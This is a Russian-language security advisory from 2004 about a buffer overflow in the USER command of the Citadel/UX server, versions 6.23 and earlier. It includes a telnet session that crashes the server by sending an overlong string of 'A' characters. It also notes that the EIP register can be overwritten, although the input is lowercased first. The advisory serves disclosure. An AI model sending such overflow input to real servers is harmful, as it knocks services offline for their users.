Security Lab

Переполнение буфера в команде USER в Citadel/UX

Дата публикации:01.08.2004
Дата изменения:17.10.2006
Всего просмотров:1242
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Citadel/UX 6.23 и более ранние версии

Описание: Уязвимость в Citadel/UX позволяет удаленному пользователю аварийно завершить работу приложения.

Удаленный пользователь может подключиться к целевой системе на 504 порту и послать USER команду с более 97 байтами, чтобы вызвать переполнение буфера и аварийно завершить работу сервера. Уязвимость позволяет перезаписать EIP регистр данными пользователя, однако данные пользователя преобразуются к нижнему регистру перед переполнением. Пример:

coki@servidor:~$ telnet localhost 504
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 servidor Citadel/UX server ready.
USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
Connection closed by foreign host.
coki@servidor:~$ 

Пример/Эксплоит: См. Источник сообщения.

URL производителя:http://www.citadel.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: No System Group - Advisory #04 - 28/07/04